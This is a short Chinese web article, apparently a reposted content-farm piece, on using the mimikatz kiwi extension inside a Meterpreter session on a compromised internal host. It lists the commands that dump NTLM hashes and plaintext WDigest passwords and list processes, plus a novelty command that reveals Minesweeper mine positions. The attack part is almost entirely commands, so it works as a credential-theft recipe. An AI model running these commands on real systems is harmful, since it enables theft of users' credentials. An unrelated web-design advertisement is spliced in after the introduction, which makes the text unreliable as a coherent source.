今天就跟大家聊聊有關怎么利用mimikatz插件獲取內網相關信息,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結了以下內容,希望大家根據這篇文章可以有所收獲。
站在用戶的角度思考問題,與客戶深入溝通,找到丁青網站設計與丁青網站推廣的解決方案,憑借多年的經驗,讓設計與互聯網技術結合,創造個性化、用戶體驗好的作品,建站類型包括:成都網站設計、網站制作、企業官網、英文網站、手機端網站、網站推廣、國際域名空間、虛擬主機、企業郵箱。業務覆蓋丁青地區。
一、生成木馬及監聽主機參考上篇文章:
內網滲透 -- 提升權限(利用提權漏洞)
二、利用mimikatz獲取內網相關信息
1、加載mimikatz
meterpreter > load kiwi
2、查看幫助信息
meterpreter > help kiwi
3、獲取用戶的hash值
meterpreter > creds_msv
4、獲取明文密碼
meterpreter > creds_wdigest
5、查看當前主機運行的進程
meterpreter > kiwi_cmd process::list
三、獲取掃雷小游戲的地雷位置
1、在小受上運行掃雷
2、在小攻上運行下面命令即可獲取地雷位置
meterpreter > kiwi_cmd minesweeper::infos
看完上述內容,你們對怎么利用mimikatz插件獲取內網相關信息有進一步的了解嗎?如果還想了解更多知識或者相關內容,請關注創新互聯行業資訊頻道,感謝大家的支持。
文章名稱:怎么利用mimikatz插件獲取內網相關信息
鏈接URL:http://m.newbst.com/article42/jpjjec.html
成都網站建設公司_創新互聯,為您提供商城網站、軟件開發、面包屑導航、手機網站建設、Google、網站導航
聲明:本網站發布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經允許不得轉載,或轉載時需注明來源: 創新互聯